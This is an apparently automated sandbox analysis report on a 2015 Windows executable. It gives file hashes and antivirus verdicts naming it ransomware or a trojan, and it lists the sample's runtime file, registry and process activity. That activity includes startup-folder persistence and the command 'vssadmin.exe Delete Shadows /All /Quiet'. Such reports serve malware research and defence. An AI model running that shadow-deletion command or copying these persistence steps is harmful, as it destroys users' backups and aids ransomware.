Analysis Date: 2015-10-05 07:48:47
MD5: 553a5a1838a4c1f283fa0d53c60da08c
SHA1: 3fdd37b468412e240d36940dc8b756e29e79965e

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section: .text md5: 2b48bc9f133ff034224e1f915fc1906e sha1: 441e1a3d119461ac4a49ada6c70f00f87a07c0e2 size: 138240
Section: .rdata md5: d260604785470e7af2e66442ad37c763 sha1: 3840d71fd35b068423bb8187cfa791c6fc1a148c size: 12288
Section: .data md5: 9bc396feb2bd0b7e07558eb461851fe5 sha1: fe0cc2415ecd178a386325144adfcc20314aa531 size: 25600
Section: .rsrc md5: 4b5dec3366d72837dde85ee3cd8ec250 sha1: 2671a13690a5e4d3f5f49e938f477624a0327672 size: 93696
Timestamp: 2015-09-17 09:32:56
Packer: Microsoft Visual C++ ?.?
PEhash: b9087859ae76a497ebd847b97baad04feeab2930
IMPhash: d923ac30ec7bd69824538354f5bc31e7
AV Rising: no_virus
AV Mcafee: no_virus
AV Avira (antivir): no_virus
AV Twister: no_virus
AV Ad-Aware: Gen:Variant.Zusy.162361
AV Alwil (avast): no_virus
AV Eset (nod32): Win32/Kryptik.DYCV
AV Grisoft (avg): Crypt_r.TI
AV Symantec: no_virus
AV Fortinet: W32/Injector.CIUZ!tr
AV BitDefender: Gen:Variant.Zusy.162361
AV K7: Trojan ( 004ce5441 )
AV Microsoft Security Essentials: Worm:Win32/Gamarue.AU
AV MicroWorld (escan): Gen:Variant.Zusy.162361
AV MalwareBytes: Ransom.Winlock
AV Authentium: W32/Agent.XL.gen!Eldorado
AV Frisk (f-prot): no_virus
AV Ikarus: no_virus
AV Emsisoft: Gen:Variant.Zusy.162361
AV Zillya!: no_virus
AV Kaspersky: Trojan-Ransom.Win32.Cryptodef.yur
AV Trend Micro: no_virus
AV CAT (quickheal): Ransom.Crowti.A4
AV VirusBlokAda (vba32): no_virus
AV Padvish: no_virus
AV BullGuard: Gen:Variant.Zusy.162361
AV Arcabit (arcavir): Gen:Variant.Zusy.162361
AV ClamAV: no_virus
AV Dr. Web: Trojan.DownLoader16.31313
AV F-Secure: Gen:Variant.Zusy.162361
AV CA (E-Trust Ino): no_virus

Runtime Details:

Process
↳ C:\malware.exe

Creates Process: C:\WINDOWS\explorer.exe

Process
↳ C:\WINDOWS\explorer.exe

Creates File: C:\Documents and Settings\Administrator\Start Menu\Programs\Startup\6ff06165.exe
Creates File: C:\6ff06165\6ff06165.exe
Creates File: C:\Documents and Settings\Administrator\Application Data\6ff06165.exe
Creates Process: -k netsvcs
Creates Process: vssadmin.exe Delete Shadows /All /Quiet

Process
↳ -k netsvcs

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝ 1
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!

Process
↳ vssadmin.exe Delete Shadows /All /Quiet

Creates File: PIPE\lsarpc

Network Details:

